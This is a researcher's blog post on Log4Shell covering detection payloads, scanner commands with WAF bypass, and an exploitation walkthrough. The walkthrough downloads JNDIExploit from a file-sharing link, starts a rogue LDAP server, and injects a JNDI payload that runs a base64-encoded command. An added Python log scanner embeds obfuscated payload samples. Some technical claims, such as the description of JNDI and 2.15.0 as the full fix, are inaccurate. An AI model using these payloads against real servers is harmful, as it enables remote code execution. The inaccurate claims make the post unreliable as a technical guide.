Research on Log4Shell (CVE-2021-44228)

Prajit Sindhkar
3 min read · Jan 4, 2022

Hello guys 👋👋, Prajit here from the BUG XS Team, Cybersecurity and Red Team Intern at Cyber Sapiens United LLP. In this role I am regularly given some interesting tasks; for my seventh task I was asked to research the recent CVE which shook the world of cybersecurity, which all of you might know about: Log4Shell, CVE-2021-44228.

What is Apache Log4j and why is this library so popular?

Apache Log4j is a Java-based logging utility which is part of the Apache Logging Services. This library is one of the easiest ways to log errors and bugs, and it is used by the majority of Java developers. To understand this vulnerability you first need to understand two terms, JNDI and Log4j.

JNDI is a plugin/component which helps transfer data from a web application to an LDAP server; every such request is carried out with the help of JNDI, and all of this information transfer is logged somewhere, which is where Log4j comes in (hence it is a library).

Which versions of the Log4j library and software are vulnerable?

Apache Log4j2 versions from 2.0 to 2.14.1 are affected by this vulnerability.

Why is CVE-2021-44228 so dangerous?

This CVE is very dangerous because 90% of the software using this library is vulnerable to it, including smart watches, smart TVs, games, etc. In short, anything which uses Java might be vulnerable. This is the reason why many bug bounty programs and companies are paying double to security researchers who find and report this vulnerability. In order to exploit the Log4j vulnerability, attackers have to get data inserted into a log. That insertion point presumably comes from the Internet, and if you have credentials stored at that endpoint, the attacker can gain complete access to everything.

How can this vulnerability be detected?

This vulnerability can be detected with many methods. First of all, the payload used will be of the format ${jndi:ldap://attacker.com/a}, where attacker.com is an attacker-controlled server. You can use a Burp Collaborator link, dnslog.cn, an interactsh server or my favourite, http://canarytokens.org/generate, to get the payload ready.

Step 1: You can form the payload with the following steps:

a. Go to http://canarytokens.org/generate

b. Select the token type as Log4j, enter an email address and then a name.

c. Click on generate and the payload will be ready.

Step 2: Hunting

1) Detection via manual method: You have to put the payload at every point where you think there will be a server interaction or a logging service, e.g. support requests, a chat service, writing a review, etc. Place the payload and wait for it to fire. Once it fires you will get an email, and once you get the email the target is vulnerable to Log4j RCE.

2) Detection via template: You can use the Nuclei templates at https://github.com/numanturle/Log4jNuclei to find this vulnerability.

3) Detection via automation: You can automate the process of hunting for Log4j with the script available here: https://github.com/fullhunt/log4j-scan

Command: $ python3 log4j-scan.py -l urls.txt --headers-file headers-large.txt --waf-bypass --run-all-tests

With the above command you test the maximum number of cases for Log4j, including request headers and WAF bypass techniques.
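All three hunting methods above rely on the same thing: a ${jndi:...} lookup string reaching a logger, possibly in the obfuscated forms that the --waf-bypass option refers to. As an added example (not code from the post or from the tools it links), here is a defender-side Python checker that collapses nested ${lower:...}, ${upper:...} and ${...:-default} lookups in log lines and reports every line that still contains a JNDI lookup; the log lines, IPs and hostnames are constructed.

```python
import re

# Constructed sample web-server log lines (not from the post); the User-Agent
# field of lines 2 and 3 carries a Log4Shell lookup, line 3 in obfuscated form.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Dec/2021:10:01:09 +0000] "GET /login HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example/a}"
203.0.113.9 - - [10/Dec/2021:10:02:31 +0000] "GET /api HTTP/1.1" 404 "-" "${${lower:j}${upper:n}di:${::-l}dap://198.51.100.4:1389/x}"
203.0.113.11 - - [10/Dec/2021:10:03:00 +0000] "GET /about HTTP/1.1" 200 "-" "curl/7.79.1"
"""

# Innermost lookups only (no nested "${" inside the body); the optional
# lower:/upper: prefix and the ":-default" form are the common obfuscations.
_LOOKUP = re.compile(r"\$\{(?:(?P<fn>lower|upper)\s*:)?(?P<body>[^${}]*)\}")

# After normalisation the lookup name is plain; Log4j matches it case-insensitively.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:[^}]*\}", re.IGNORECASE)


def _reduce(m):
    """Evaluate one lookup the way Log4j would, or leave it untouched if unknown."""
    fn, body = m.group("fn"), m.group("body")
    if fn:
        return body.lower() if fn == "lower" else body.upper()
    if ":-" in body:                      # "${env:X:-j}" / "${::-j}" -> default value
        return body.split(":-", 1)[1]
    return m.group(0)                     # e.g. the jndi lookup itself: keep it


def normalize(text, max_rounds=10):
    """Repeatedly collapse inner lookups so nested obfuscation becomes a plain string."""
    for _ in range(max_rounds):
        new = _LOOKUP.sub(_reduce, text)
        if new == text:
            break
        text = new
    return text


def find_log4shell_attempts(log_text):
    """Return (line_no, scheme, normalized_lookup) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = _JNDI.search(normalize(line))
        if m:
            hits.append((n, m.group("scheme").lower(), m.group(0)))
    return hits


if __name__ == "__main__":
    for line_no, scheme, lookup in find_log4shell_attempts(SAMPLE_LOG):
        print(f"line {line_no}: {scheme} lookup {lookup}")
```

Lookups the normalizer does not evaluate (for example ${sys:...} or ${date:...}) are left in place, so a line whose JNDI string is split by one of them will still show literal ${ fragments and deserves a manual look.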

Step 3: Further Exploitation

1. Download the following zip file: https://anonfiles.com/xd07G204v9/JNDIExploit.v1.2_zip and unzip it.

2. Start the LDAP server with the following command:

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i YOUR_PUBLIC_IP -p 1234

3. Now inject the payload, formed as follows:

${jndi:ldap://YOUR_PUBLIC_IP:1389/Basic/Command/Base64/BASE64_ENCODED_COMMAND}

What is the impact of this vulnerability?

Attackers who can control log messages or log message parameters can execute arbitrary code, loaded from LDAP servers, on the vulnerable server when message lookup substitution is enabled. Hence attackers can also exfiltrate server information through this.

How to protect your server from attacks?

Update Apache Log4j to version 2.15.0, which has been released with the fix for the Log4Shell vulnerability.


That is all for today's writeup.

Thanks For Reading 😊

Profile Links:

Twitter: https://twitter.com/SAPT01

LinkedIn: https://www.linkedin.com/in/prajit-sindhkar-3563b71a6/

Instagram: https://instagram.com/prajit_01?utm_medium=copy_link

BUG XS Official Website: https://www.bugxs.co/


Prajit Sindhkar

I am an India-based Security Researcher, Bugcrowd Top 500 Hacker and Bug Bounty Leader of the BUGXS Community.